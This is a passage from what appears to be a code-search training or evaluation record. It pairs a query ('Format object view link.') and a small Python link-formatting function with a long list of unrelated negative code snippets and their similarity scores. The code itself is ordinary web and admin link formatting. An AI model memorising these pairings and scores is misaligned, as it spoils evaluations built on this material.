print_link(link):\n print('<' + helper(link).rstrip() + '>')", "def _inline(line):\n if len(line) == 0:\n return ''\n\n # Regexp of protocols supported in hyperlinks (should be protocols that\n # we can expect web browsers to support)\n protocols = \"https?|ftp|sftp|file|afs|nfs\"\n\n\n # Prepare usual links: prefix every \"www.\" with \"http://\"\n # unless there is a // before\n line = re.sub('(^|\\s|[^\\/])(www\\.)', '\\\\1http://\\\\2', line, re.I);\n\n # replace the @ sign with an HTML entity, if it is used within\n # an url (e.g. for pointers to mailing lists). This way, the\n # @ sign doesn't get mangled in the e-mail markup code\n # below. See bug #2689 on http://gna.org/ for reference.\n line = re.sub(\"([a-z]+://[^<>[:space:]]+)@\", \"\\\\1&#64;\", line, re.I)\n\n # Prepare the markup for normal links, e.g. http://test.org, by\n # surrounding them with braces []\n # (& = begin of html entities, it means a end of string unless\n # it is &amp; which itself is the entity for &)\n line = re.sub('(^|\\s|[^\\[])((' + protocols + '):\\/\\/(&amp;|[^\\s&]+[a-z0-9\\/^])+)',\n '\\\\1[\\\\2]', line, re.I)\n\n # do a markup for mail links, e.g. info@support.org\n # (do not use utils_emails, this does extensive database\n # search on the string\n # and replace addresses in several fashion. Here we just want to make\n # a link). Make sure that 'cvs -d:pserver:anonymous@cvs.sv.gnu.org:/...'\n # is NOT replaced.\n line = re.sub(\"(^|\\s)([a-z0-9_+-.]+@([a-z0-9_+-]+\\.)+[a-z]+)(\\s|$)\",\n '\\\\1' + '<a href=\"mailto:\\\\2\">\\\\2</a>' + '\\\\4', line, re.I)\n\n # Links between items\n # FIXME: it should be i18n, but in a clever way, meaning that everytime\n # a form is submitted with such string, the string get converted in\n # english so we always get the links found without having a regexp\n # including every possible language.\n # Trackers URLs disabled until trackers are actually implemented :)\n #trackers = {\n # \"bugs?\" : \"bugs/?\",\n # \"support|sr\" : \"support/?\",\n # \"tasks?\" : \"task/?\",\n # \"patch\" : \"patch/?\",\n # # In this case, we make the link pointing to support, it wont matter,\n # # the download page is in every tracker and does not check if the tracker\n # # is actually used\n # \"files?\" : \"support/download.php?file_id=\",\n # }\n #for regexp,link in trackers:\n # # Allows only two white space between the string and the numeric id\n # # to avoid having too time consuming regexp. People just have to pay\n # # attention.\n # line = re.sub(\"(^|\\s|\\W)($regexp)\\s{0,2}#([0-9]+)\",\n # '\\1<em><a href=\"' + 'sys_home'\n # + link + '\\\\3\">\\\\2&nbsp;#\\\\3</a></em>',\n # line, re.I)\n\n # add an internal link for comments\n line = re.sub('(comments?)\\s{0,2}#([0-9]+)',\n '<em><a href=\"#comment\\\\2\">\\\\1&nbsp;#\\\\2</a></em>',\n line, re.I)\n\n # Add support for named hyperlinks, e.g.\n # [http://savane-forge.org/ Text] -> <a href=\"http://savane-forge.org/\">Text</a>\n line = re.sub(\n # find the opening brace '['\n '\\['\n # followed by the protocol, either http:// or https://\n + '((' + protocols + '):\\/\\/'\n # match any character except whitespace or the closing\n # brace ']' for the actual link\n + '[^\\s\\]]+)'\n # followed by at least one whitespace\n + '\\s+'\n # followed by any character (non-greedy) and the\n # next closing brace ']'\n + '(.+?)\\]',\n '<a href=\"\\\\1\">\\\\3</a>', line)\n\n # Add support for unnamed hyperlinks, e.g.\n # [http://savane-forge.org/] -> <a href=\"http://savane-forge.org/\">http://savane-forge.org/</a> \n line = re.sub(\n # find the opening brace '['\n '\\['\n # followed by the protocol, either http:// or https://\n # (FIXME: which protocol does it makes sense to support, which one\n # should we ignore?)\n + '((' + protocols + '):\\/\\/'\n # match any character except whitespace (non-greedy) for\n # the actual link, followed by the closing brace ']'\n + '[^\\s]+?)\\]',\n '<a href=\"\\\\1\">\\\\1</a>', line)\n\n # *word* -> <strong>word</strong>\n line = re.sub(\n # find an asterisk\n '\\*'\n # then one character (except a space or asterisk)\n + '([^* ]'\n # then (optionally) any character except asterisk\n + '[^*]*?)'\n # then an asterisk\n + '\\*',\n '<strong>\\\\1</strong>', line)\n\n # _word_ -> <em>word</em>\n line = re.sub(\n # allow for the pattern to start at the beginning of a line.\n # if it doesn't start there, the character before the slash\n # must be either whitespace or the closing brace '>', to\n # allow for nested html tags (e.g. <p>_markup_</p>).\n # Additionally, the opening brace may appear.\n # See bug #10571 on http://gna.org/ for reference.\n '(^|\\s+|>|\\()'\n # match the underscore\n + '_'\n # match any character (non-greedy)\n + '(.+?)'\n # match the ending underscore and either end of line or\n # a non-word character\n + '_(\\W|$)',\n '\\\\1<em>\\\\2</em>\\\\3',\n line)\n\n return line", "def __str__(self) -> str:\n outstr = self.access\n if self.demux is not None:\n outstr += \"/\" + self.demux\n outstr += \"://\" + self.url\n if self.title is not None or \\\n self.chapter is not None or \\\n self.endtitle is not None or \\\n self.endchapter is not None:\n outstr += '#'\n if self.title is not None:\n outstr += self.title\n if self.chapter is not None:\n outstr += \":\" + self.chapter\n if self.endtitle is not None or \\\n self.endchapter is not None:\n outstr += '-'\n if self.endtitle is not None:\n outstr += self.endtitle\n if self.endchapter is not None:\n outstr += ':' + self.endchapter\n if self.options is not None:\n for option in self.options.items():\n outstr += ' :' + option\n return outstr", "def antweb_links(request, format='csv'):\n\n\n\ttaxonomy = []\n\tif request.GET.get('taxon_code'):\n\t\ttaxonomy = Taxonomy.objects.raw(\"\"\"\n\t\tSELECT taxon_code, subfamily_name, genus_name, species_name\n\t\tFROM map_taxonomy_list\n\t\tWHERE taxon_code = %s\n\t\t\"\"\", [request.GET.get('taxon_code')])\n\t\t\n\t\t# serialize to JSON\n\t\tjson_objects = [{'key': t.taxon_code, 'speciesName': t.species_name, 'genusName': t.genus_name, 'subfamilyName': t.subfamily_name} for t in taxonomy]\n\t\t\n\t\treturn JSONResponse({'taxonomy': json_objects})\n\t\t\n\telif request.GET.get('genus_name'):\n\t\ttaxonomy = Taxonomy.objects.raw(\"\"\"\n\t\tSELECT genus_name, subfamily_name,taxon_code\n\t\tFROM map_taxonomy_list\n\t\tWHERE genus_name = %s\n\t\tGROUP BY genus_name, subfamily_name,taxon_code\n\t\t\"\"\", [request.GET.get('genus_name')])\n\t\t\n\t\t# serialize to JSON\n\t\tjson_objects = [{'key': t.genus_name, 'subfamilyName': t.subfamily_name} for t in taxonomy]\n\t\t\n\t\treturn JSONResponse({'taxonomy': json_objects})\n\t\n\telse:\n\t\treturn JSONResponse({'taxonomy': []})", "def format_link(self, link):\n new_link = \"/\".join(link.split(\"/\")[0:3])\n return \"http://www.imdb.com\" + new_link", "def __str__ (self) :\n\t\ttext_rule = \"\"\n\t\t\n\t\tfor key, rules in self.production_rules.items() :\n\t\t\ttext_rule += \"\\nRULE \" + key + \" = [\\n\\t\"\n\t\t\trule_in_a_line = []\n\t\t\tfor rule in rules :\n\t\t\t\t#rule_in_a_line.append(\" + \".join([r.val+\"(\"+r.type+\")\" for r in rule]))\n\t\t\t\trule_in_a_line.append(\" + \".join([r.__str__() for r in rule]))\n\t\t\ttext_rule += \"\\n\\t\".join(rule_in_a_line) + \"\\n]\"\n\t\ttext_rule += \"\\n\\n\"\n\t\t\n\t\ttext_rule += \"LABELS = \" + json.dumps (self.labels, indent=2) + '\\n\\n'\n\n\t\ttext_rule += \"STRUCT = [\\n{}\\n]\\n\\n\".format(\n\t\t\t\"\".join([\n\t\t\t\t\"\\t{} : {{\\n\\t\\t{}\\n\\t}}\\n\".format (\n\t\t\t\t\tkey, \", \\n\\t\\t\".join(val)\n\t\t\t\t) for key, val in self.keeper.items()\n\t\t\t])\n\t\t)\n\t\ttext_rule += \"STRNODE = [\\n{}\\n]\\n\\n\".format(\n\t\t\t\"\".join(self.strnodes)\n\t\t)\n\t\tfor regex, label in self.tokens :\n\t\t\ttext_rule += \"TOKEN \" + label + \" = regex('\" + regex + \"')\\n\"\n\n\t\treturn text_rule", "def __repr__(self):\n args = []\n if self.name != \"alpha\":\n args.append(repr(self.name))\n if self.propertiesstr:\n args.append(repr(self.propertiesstr))\n elif self.propertiesstr:\n args.append(\"attr=%r\" % self.propertiesstr)\n return \"%s(%s)\" % (type(self).__name__, \", \".join(args))" ]
[ "0.784745", "0.6504912", "0.64552146", "0.6426217", "0.62232155", "0.6217698", "0.60861593", "0.60861593", "0.60610193", "0.60496616", "0.5940354", "0.59321237", "0.5914688", "0.58717525", "0.5870953", "0.5845969", "0.5824419", "0.58027077", "0.57641745", "0.57560444", "0.57327914", "0.5715841", "0.5698075", "0.5693841", "0.5693164", "0.5693031", "0.56775624", "0.5668995", "0.5656696", "0.5642389", "0.56277734", "0.56265193", "0.56124365", "0.5593817", "0.55695003", "0.5533753", "0.55312", "0.5523837", "0.55153847", "0.5514151", "0.5511813", "0.5500131", "0.5493986", "0.549361", "0.5491652", "0.54671484", "0.545604", "0.54496294", "0.5447277", "0.54109913", "0.5408396", "0.5405952", "0.5401387", "0.53867877", "0.5381744", "0.5377864", "0.5376137", "0.5372304", "0.53598523", "0.5345939", "0.53452367", "0.5344011", "0.5325346", "0.53231794", "0.5319263", "0.5313906", "0.5297503", "0.5290494", "0.5289116", "0.5278131", "0.5275255", "0.5267903", "0.5262328", "0.52602017", "0.52481854", "0.5234007", "0.5231144", "0.52290934", "0.52284575", "0.52253824", "0.5223548", "0.52196616", "0.52196616", "0.52196616", "0.52196616", "0.5208965", "0.520751", "0.5204973", "0.5202219", "0.5195024", "0.51940584", "0.5193685", "0.51848644", "0.51815224", "0.5181074", "0.5177807", "0.5171653", "0.51646614", "0.51598763", "0.5157449" ]
0.72780514
1
Format object view link.
def object_formatter(v, c, m, p): return Markup('<a href="{0}">{1}</a>'.format( link_func(m), text))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def link(text, link_func):\n def object_formatter(v, c, m, p):\n \"\"\"Format object view link.\"\"\"\n return Markup('<a href=\"{0}\">{1}</a>'.format(\n link_func(m), text))\n return object_formatter", "def link(self, obj):\n return format_html(\n '<a href=\"{url}\">{url}</a>',\n url='https://sms.cam.ac.uk/collection/{}'.format(obj.id)\n )", "def object_view_with_links(obj, request):\n _view = _object_view(obj, request)\n obj_link = obj_ui_link = \"\"\n # UI link to the real business object referenced as topic\n if isinstance(obj, Posting):\n obj_ui_link = request.link(obj, app=get_root(request).child(\"activitystream\"))\n else:\n try:\n obj_link = request.link(obj, app=_get_collection_app(request))\n except morepath.error.LinkError:\n pass\n obj_ui_link = get_ui_link(request, obj) or \"\"\n _view.update({\n \"object_id\": obj_link,\n \"object_ui_link\": obj_ui_link})\n return _view", "def link(self, obj):\n return format_html(\n '<a href=\"{url}\">{url}</a>',\n url='https://sms.cam.ac.uk/media/{}'.format(obj.id)\n )", "def _change_link(self, obj, display_text=None):\n if not obj:\n return '?'\n fragments = [obj._meta.app_label, obj._meta.model_name, 'change']\n change_url = reverse(\"admin:{}\".format('_'.join(fragments)),\n args=(obj.id,))\n display_text = display_text or unicode(obj)\n return format_html(\"<a href={}>{}</a>\", change_url, display_text)", "def href(obj):\n if isinstance(obj, Filing):\n return reverse('filing', args=(obj.region, obj.name, obj.period_name))\n else:\n raise ValueError('cannot build a URL for {}.{} objects'.format(\n type(obj).__module__, type(obj).__name__))", "def view_link(self, obj):\n if obj.cwr:\n url = reverse(\n 'admin:music_publisher_ackimport_change', args=(obj.id,))\n url += '?preview=true'\n return mark_safe(\n '<a href=\"{}\" target=\"_blank\">View CWR</a>'.format(url))", "def pybb_link(object, anchor=''):\n\n url = hasattr(object, 'get_absolute_url') and object.get_absolute_url() or None\n #noinspection PyRedeclaration\n anchor = anchor or smart_text(object)\n return mark_safe('<a href=\"%s\">%s</a>' % (url, escape(anchor)))", "def viewurilink(uri) :\n\tname = schema.uri_to_name(uri)\n\tif name :\n\t\turl = '/view/name/' + quote(name)\n\telif uri[:7] == \"http://\" :\n\t\turl = '/view/uri/' + uri[7:]\n\telse :\n\t\turl = '/view/uri?id=' + uri\n\t\n\treturn '<a href=\"%s\">%s</a>' % (url, name or n.shorten(uri))", "def detail_link(db_obj, text=None):\n\n def build_link(obj):\n name = str(obj) if text is None else text\n return _make_link(obj.detail_url(), name)\n\n return mark_safe(', '.join(map(build_link, as_list(db_obj))))", "def view_bed_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (url_for(\"bed.index_view\", search=model.bed.name), model.bed.name)\n )\n if model.bed\n else u\"\"\n )", "def linkify(field_name):\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if linked_obj is None:\n return '-'\n app_label = linked_obj._meta.app_label\n model_name = linked_obj._meta.model_name\n view_name = f'admin:{app_label}_{model_name}_change'\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('<a href=\"{}\">{}</a>', link_url, linked_obj)\n\n _linkify.short_description = field_name # Sets column name\n return _linkify", "def view_link(self, obj):\n if obj.cwr:\n url = reverse(\n 'admin:music_publisher_cwrexport_change', args=(obj.id,))\n url += '?preview=true'\n return mark_safe(\n '<a href=\"{}\" target=\"_blank\">View CWR</a>'.format(url))", "def linkify(field_name):\n\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if linked_obj is None:\n return '-'\n app_label = linked_obj._meta.app_label\n model_name = linked_obj._meta.model_name\n view_name = f'admin:{app_label}_{model_name}_change'\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('<a href=\"{}\">{}</a>', link_url, linked_obj)\n\n _linkify.short_description = field_name # Sets column name\n return _linkify", "def item_link(self, obj):\n if obj.item is None:\n return '\\N{EM DASH}'\n\n return format_html(\n '<a href=\"{}\">{}</a>',\n reverse('admin:mediaplatform_mediaitem_change', args=(obj.item.pk,)),\n obj.item.title if obj.item.title != '' else '[Untitled]'\n )", "def __str__(self):\n\t\treturn '{0} ({1})'.format (self.name, self.link)", "def format(self, obj):\n pass", "def format(self, obj):\n pass", "def fmt(e):\n name = str(e.label.first() if hasattr(e, 'label') and e.label else e)\n if re.match(r'^[a-z]+://', name):\n return link.format(name=name, url=name)\n if hasattr(e, 'label') and e.label:\n name = e.label.first()\n url = name if re.match(r'^[a-z]+://', name) else '#' + name\n return link.format(name=name, url=url)\n elif re.match(r'^[a-z]+://', str(e)):\n return link.format(name=e, url=e)\n else:\n return str(e).replace('owl.', 'owl:')", "def get_object_view_url(self, nuxeo_id):\n parts = urlparse.urlsplit(self.nx.conf[\"api\"])\n url = \"{}://{}/Nuxeo/nxdoc/default/{}/view_documents\".format(parts.scheme, parts.netloc, nuxeo_id) \n return url", "def getLink(self):", "def cook(self, obj, request, field_name):\n view_url = ''\n edit_url = ''\n \n if hasattr(obj, 'get_absolute_url'):\n view_url = obj.get_absolute_url();\n if request.user.has_perm('%s.change_%s' %(obj._meta.app_label, obj._meta.model_name)):\n\t\t\tedit_url = reverse('admin:%s_%s_change' %(obj._meta.app_label, obj._meta.model_name), args=[obj.id])\n\t\t\n result = {'text': unicode(obj),\n 'view_url': view_url,\n 'edit_url': edit_url\n }\n return result", "def deriveLinkfromObject(obj, scale=1, parent_link=True, parent_objects=True,\n reparent_children=True, nameformat='', scaleByBoundingBox=False):\n log('Deriving link from ' + nUtils.getObjectName(obj), level=\"INFO\")\n # create armature/bone\n bUtils.toggleLayer('link', True)\n bpy.ops.object.select_all(action='DESELECT')\n bpy.ops.object.armature_add()\n newlink = bpy.context.active_object\n newlink.name = obj.name + \"_link\"\n newlink.matrix_world = obj.matrix_world\n newlink.phobostype = 'link'\n if scaleByBoundingBox:\n bound_box = (\n max([c[0] for c in obj.bound_box]),\n max([c[1] for c in obj.bound_box]),\n max([c[2] for c in obj.bound_box]),\n )\n newlink.scale = [max(bound_box)*scale] * 3\n else:\n newlink.scale = [scale] * 3\n if obj.parent is not None and parent_link:\n eUtils.parentObjectsTo(newlink, obj.parent)\n if parent_objects:\n eUtils.parentObjectsTo(obj, newlink)\n if reparent_children:\n eUtils.parentObjectsTo(list(obj.children), newlink)\n if bpy.context.scene.phoboswireframesettings.links:\n newlink.display_type = \"WIRE\"\n return newlink", "def view_family_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (url_for(\"family.index_view\", search=model.family.internal_id), model.family,)\n )\n if model.family\n else u\"\"\n )", "def render_url(self, object_id):\r\n return reverse(\"%s:insert_%s_%s_render\" % (\r\n self.admin_site.name,\r\n self.model._meta.app_label,\r\n self.model._meta.module_name\r\n ), args=(object_id,))", "def build_url_long(self, obj):\n if obj.slug:\n url = self.request.build_absolute_uri(reverse('build_repo', args=(obj.slug,)))\n return '<a href=\"%s\" target=\"_blank\">%s<a>' % (url, url)\n else:\n return ''", "def view_invoice_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (\n url_for(\"invoice.index_view\", search=model.invoice.id),\n model.invoice.invoiced_at.date()\n if model.invoice.invoiced_at\n else \"In progress\",\n )\n )\n if model.invoice\n else u\"\"\n )", "def command_view(arguments):\n global current_mode, current_name\n current_mode = Mode.links\n current_name = arguments[0]\n return 'Now viewing entity \"' + current_name + '\"'", "def linkify(obj, link_text=''):\n try:\n lst = []\n # if obj is not a list, convert it into a list\n if not getattr(obj, '__iter__', False):\n obj = [obj]\n for item in obj:\n if hasattr(item, 'child'):\n item = item.child\n if link_text == '':\n l_text = unicode(item)\n else:\n try:\n link_text = link_text.encode('ascii')\n l_text = getattr(item, link_text, link_text)\n except UnicodeEncodeError:\n l_text = link_text\n if not (isinstance(item, Content) and\n isinstance(l_text, SafeText)):\n l_text = filter.force_escape(l_text)\n format_args = (item.get_absolute_url(), l_text)\n lst.append(mark_safe('<a href=\\'%s\\'>%s</a>' % format_args))\n\n # nonlists obj's should be returned as nonlists\n return lst[0] if len(lst) == 1 else lst\n except:\n return ''", "def renderView(self):\n html = \"\"\n if self.lms.lms == \"other\":\n html += \"_______________________________<br/>\"\n url = \"http://%s\" % self.lms.otherUrl\n html += \"<br/><b>%s </b>\" % self.lms.otherLabel\n html += '<a href=\"%s\">%s</a>' % (url, url) \n return html", "def work_link(self, obj):\n url = reverse('admin:music_publisher_work_change', args=[obj.work.id])\n link = '<a href=\"{}\">{}</a>'.format(url, obj.work)\n return mark_safe(link)", "def __str__(self):\n return '<a href=\"%s\" class=\"%s\" %s>%s</a>' % (self.url, self.cssclass, self.options, self.text)", "def urlLink(self, text=None, url=None, attrs={}):\n if not text:\n text = self.titleOrId()\n text = escape(text)\n if not self.checkRemotePerm(\"View\", self):\n return text\n if not url:\n url = self.getPrimaryUrlPath()\n if len(attrs):\n return '<a href=\"%s\" %s>%s</a>' % (url,\n ' '.join('%s=\"%s\"' % (x,y) for x,y in attrs.items()),\n text)\n else:\n return '<a href=\"%s\">%s</a>' % (url, text)", "def show_orion_url(self, obj):\n return obj.orion_url", "def link(self):\n return f\"[{self.numbered_title}]({self.html_url})\"", "def get_link(self, path, method, view):\n description = self.get_description(path, method, view)\n\n fields = []\n if '---' not in description:\n fields += self.get_path_fields(path, method, view)\n fields += self.get_serializer_fields(path, method, view)\n fields += self.get_pagination_fields(path, method, view)\n fields += self.get_filter_fields(path, method, view)\n\n if description:\n vals = list(yaml.load_all(description))\n description, para_lst = vals[0], vals[1]\n if para_lst and para_lst.get('parameters'):\n for para in para_lst['parameters']:\n fields.append(coreapi.Field(\n name=para['name'],\n required=para['required'],\n location=para.get('paramType', 'query'),\n description=para['description'],\n type=para.get('type', 'string')\n ))\n\n if fields and any([field.location in ('form', 'body') for field in fields]):\n # encoding = self.get_encoding(path, method, view)\n encoding = 'multipart/form-data'\n else:\n encoding = None\n\n\n if self.url and path.startswith('/'):\n path = path[1:]\n\n return coreapi.Link(\n url=urlparse.urljoin(self.url, path),\n action=method.lower(),\n encoding=encoding,\n fields=fields,\n description=description\n )", "def _generate_context_link(\n context: mlrun.MLClientCtx, link_text: str = \"view in MLRun\"\n ) -> str:\n return (\n '<a href=\"{}/{}/{}/jobs/monitor/{}/overview\" target=\"_blank\">{}</a>'.format(\n config.resolve_ui_url(),\n config.ui.projects_prefix,\n context.project,\n context.uid,\n link_text,\n )\n )", "def _format_to_link(self, commit):\n return os.path.join(self.mount, \"commits-by-hash\", self._hash_updir(commit), commit) + \"/\"", "def edit_link(db_object, text=None):\n if text is None:\n text = 'edit'\n return _make_link(db_object.update_url(), text)", "def object_view(request, simulation, object_name):\n owner = can_edit(request.user, simulation)\n query = get_query(object_name, simulation)\n large_count = query.count() > OBJECT_THRESHOLD\n network_empty = False\n if object_name == 'link':\n # Allow the user to edit links only if there are at least two centroids,\n # one crossing and one congestion function.\n nb_centroids = get_query('centroid', simulation).count()\n nb_crossings = get_query('crossing', simulation).count()\n nb_functions = get_query('function', simulation).count()\n network_empty = not (nb_centroids >= 2 and nb_crossings >= 1\n and nb_functions >= 1)\n import_form = ImportForm()\n context = {\n 'simulation': simulation,\n 'owner': owner,\n 'count': query.count(),\n 'object': object_name,\n 'large_count': large_count,\n 'network_empty': network_empty,\n 'import_form': import_form,\n }\n return render(request, 'metro_app/object_view.html', context)", "def make_link_to(self, index, caption):\n \n # index is an int\n return '<a href=\"/log/'+str(index)+'\"> '+caption+' '+str(index)+'</a>'", "def _render_link(self, url):\n # The method handlers for the 'text/html' set a flag to indicate that it's to be\n # rendered in a browser. If so, we'll render the link as clickable <a href=\"...\">.\n if self.is_html:\n return f\"<a href='{url}'>{url}</a>\"\n return url", "def to_html(self) -> str:\n return f'''\n <a href=\"{self.link}\"> ({self.source_name}, {self.timestamp.strftime('%Y')}) </a>\n '''", "def view_sample_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (url_for(\"sample.index_view\", search=model.sample.internal_id), model.sample,)\n )\n if model.sample\n else u\"\"\n )", "def channel_link(self, obj):\n if obj.channel is None:\n return '\\N{EM DASH}'\n\n return format_html(\n '<a href=\"{}\">{}</a>',\n reverse('admin:mediaplatform_channel_change', args=(obj.channel.pk,)),\n obj.channel.title if obj.channel.title != '' else '[Untitled]'\n )", "def object_url(self, object_t, object_id=None, relation=None):\n if object_t not in self.objects_types:\n raise TypeError(f\"{object_t} is not a valid type\")\n request_items = (\n str(item) for item in [object_t, object_id, relation] if item is not None\n )\n request_path = \"/\".join(request_items)\n return self.url(request_path)", "def __url(self, object):\n return '/'.join(object.getPhysicalPath())", "def exac_link(variant_obj):\n url_template = (\"http://exac.broadinstitute.org/variant/\"\n \"{this[chromosome]}-{this[position]}-{this[reference]}\"\n \"-{this[alternative]}\")\n return url_template.format(this=variant_obj)", "def calendar_view_link(calendar):\n linkdef = {\n \"label\": calendar.name, \"modal\": True,\n \"title\": _(\"View calendar detail\")\n }\n if calendar.__class__.__name__ == \"UserCalendar\":\n linkdef[\"url\"] = reverse(\n \"modoboa_radicale:user_calendar_detail\", args=[calendar.pk]\n )\n else:\n linkdef[\"url\"] = reverse(\n \"modoboa_radicale:shared_calendar_detail\", args=[calendar.pk]\n )\n return render_link(linkdef)", "def get_links(self, obj):\n request = self.context['request']\n detail_name = '{}-detail'.format(get_model_name(obj.__class__))\n return {\n 'self': reverse(detail_name, kwargs={'pk': obj.pk}, request=request),\n }", "def format_link_segment(value):\n format_type = json_api_settings.FORMAT_RELATED_LINKS\n return format_value(value, format_type)", "def make_absolute_object_link(db,id,bytes = []):\n href = db.locals[\"db_url\"] +\"/dispatcher.py/\" + \"/\".join(str(x) for x in id)\n if bytes:\n href += byte_query(bytes)\n return href", "def __repr__(self):\n if self.rest:\n rest_repr = ', ' + repr(self.rest)\n else:\n rest_repr = ''\n return 'Link({0}{1})'.format(self.first, rest_repr)", "def format_item_display(self, obj):\n return u\"%s - %s\" % (escape(obj.nombre),obj.rfc)", "def format_link(self):\n self.url = sys.argv[1]\n video_link_regex = re.compile(\n r'(https?://)?(www\\.)?youtube\\.(com|nl)/watch\\?v=([\\w-]+)')\n playlist_link_regex = re.compile(\n r'(https?://)?(www\\.)?youtube\\.(com|nl)/playlist\\?list=([\\w-]+)')\n # check if it's a single video link\n if video_link_regex.search(self.url):\n result_regex = video_link_regex.search(self.url)\n self. url = result_regex.group().split('&')[0]\n self.show_formats()\n # check if it's a playlist link\n elif playlist_link_regex.search(self.url):\n logging. debug('Yes it a playlist')\n result_regex = playlist_link_regex.search(self.url)\n playlist_link = result_regex.group().split('&')[0]\n self. get_videos_in_playlist()\n # check if link is not a youtube link\n else:\n logging.debug('Not even a yt link')\n sys. exit()", "def gnomad_link(variant_obj):\n url_template = (\"http://gnomad.broadinstitute.org/variant/{this[chromosome]}-\"\n \"{this[position]}-{this[reference]}-{this[alternative]}\")\n return url_template.format(this=variant_obj)", "def label_link(self, obj):\n if not obj.record_label:\n return None\n url = reverse(\n 'admin:music_publisher_label_change', args=[obj.record_label.id])\n link = '<a href=\"{}\">{}</a>'.format(url, obj.record_label)\n return mark_safe(link)", "def url_for_object(self, key: typing.Optional[str]=None) -> str:\n ...", "def requestShowLink(self, *args, **kwargs): # real signature unknown\n pass", "def entry_shortlink(request, object_id):\n entry = get_object_or_404(Entry, pk=object_id)\n return redirect(entry, permanent=True)", "def make_object_link(philo_id, hit_bytes):\n href = \"./\" + \"/\".join(str(x) for x in philo_id) + byte_query(hit_bytes)\n return href", "def view_family_sample_link(unused1, unused2, model, unused3):\n\n del unused1, unused2, unused3\n\n return Markup(\n u\"<a href='%s'>%s</a>\"\n % (url_for(\"familysample.index_view\", search=model.internal_id), model.internal_id,)\n )", "def get_anchor_tag(self):\n return f\"<a href={self.get_absolute_url()}>{self.display_name}</a>\"", "async def link_to(self, *args):\n pass", "def format_link(self, link):\n new_link = \"/\".join(link.split(\"/\")[0:3])\n return \"http://www.imdb.com\" + new_link", "def path_for(objectid):", "def url(self):\n if self.term_type != 'C':\n url_fmt = self.path_level_url_fmt\n url_info = {'id': self.term_type}\n else:\n url_fmt = self.obj_level_url_fmt\n url_info = {'org_prefix': self.org_prefix, 'id': self.term_id}\n\n return url_fmt % url_info", "def format_match(self, obj):\n return self.format_item_display(obj)", "def format_match(self, obj):\n return self.format_item_display(obj)", "def url_to_edit(obj):\n return reverse(\n 'admin:%s_%s_change' % (obj._meta.app_label, obj._meta.model_name),\n args=[obj.id]\n )", "def print_link(link):\n print('<' + helper(link).rstrip() + '>')", "def format_url(self, url, text):\r\n return u'<a href=\"%s\">%s</a>' % (escape(url), text)", "def get_url(self):\n if self.object_id is None:\n return '{0}/{1}'.format(self.parent.get_url(), self.path)\n\n return '{0}/{1}/{2}'.format(self.parent.get_url(), self.path,\n self.object_id.replace('/', '-'))", "def __repr__(self):\n ## return str(self.first) + \" -> \" + repr(self.rest)\n if self.rest is Link.empty:\n rest_str = \"\"\n else:\n rest_str = \", \" + repr(self.rest)\n return \"Link({0}{1})\".format(self.first, rest_str)", "def render_summary(self, record, value):\n review_link = reverse('review-detail', kwargs={'ods_code': record.organisations.all()[0].ods_code, 'cobrand': 'choices', 'api_posting_id': record.api_posting_id})\n return mark_safe(u'<a href=\"{0}\">{1}</a>'.format(review_link, conditional_escape(value)))", "def format_url(self, command):\n\n return '{}{}'.format(self.url,command)", "def get_obj_admin_path(obj):\n from django.contrib.contenttypes.models import ContentType\n content_type = ContentType.objects.get_for_model(obj)\n return '/admin/%s/%s/%s' % (content_type.app_label, content_type.model, str(obj.pk))", "def html_link(self):\n if self.id:\n unescaped_url = f'/themes/{self.name or \"\"}--{self.id}'\n return mark_safe(f'<a href=\"{self.url_path}\" target=\"_blank\">{unescaped_url}</a>')\n else:\n return 'Pas encore live'", "def process_link(self, env, refnode, has_explicit_title, title, target):\n refnode['json:name'] = normalize_object_name(target)\n return title, normalize_object_name(target)", "def format(obj): # pylint: disable=W0622\n# print '>>', obj\n if hasattr(obj, 'format'):\n return obj.format()\n return \"%s\" % obj", "def playlist_link(self, obj):\n if obj.playlist is None:\n return '\\N{EM DASH}'\n\n return format_html(\n '<a href=\"{}\">{}</a>',\n reverse('admin:mediaplatform_playlist_change', args=(obj.playlist.pk,)),\n obj.playlist.title if obj.playlist.title != '' else '[Untitled]'\n )", "def version_absolute_url_path(self, obj,date=None):\n date = date if date is not None else obj.bobobase_modification_time()\n version = '/%s%s' % (self.prefix, int(date.timeTime()))\n local_path = self.absolute_url_path()\n parent_path = local_path.replace('/'+self.id, '')\n obj_path = obj.absolute_url_path()\n return local_path + version + obj_path.replace(parent_path, '')", "def render_name(self, record):\n return format_html(\n \"\"\"<a href=\"#\" class=\"js-view-edit\"\n data-toggle=\"tooltip\" data-url=\"{0}\"\n title=\"{1}\">{2}</a>\"\"\",\n reverse('table:view_edit', kwargs={'pk': record['id']}),\n _('Change the columns present in the view'),\n record['name'],\n )", "def get_href(self, obj: Profile):\n request = self.context['request']\n return reverse('accounts:profile', request=request, kwargs={'pk': obj.id})", "def view_application_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (\n url_for(\"application.index_view\", search=model.application.tag),\n model.application.tag,\n )\n )\n if model.application\n else u\"\"\n )", "def subscriber_detail(self):\n model_name = Subscriber._meta.object_name.lower()\n app_label = self._meta.app_label\n link = '/admin/%s/%s/' % (app_label, model_name)\n link += '?campaign__id=%d' % self.id\n display_link = _(\"<a href='%(link)s'>%(name)s</a>\") % \\\n {'link': link, 'name': _('details')}\n return display_link", "def link_view(context, request):\n can_edit = ptah.checkPermission(ptah_cms.ModifyContent, context)\n\n if can_edit:\n vform = form.DisplayForm(context, request) # needs better UI\n vform.fields = Link.__type__.fieldset\n vform.content = {\n 'title': context.title,\n 'description': context.description,\n 'href': context.href}\n vform.update()\n # the below render() would display form html without enclosing layout\n #return vform.render()\n\n \"\"\"\n this should render the display form with layout applied\n The layout is the \"wrapping HTML\" e.g. ptah_app layout you\n see at 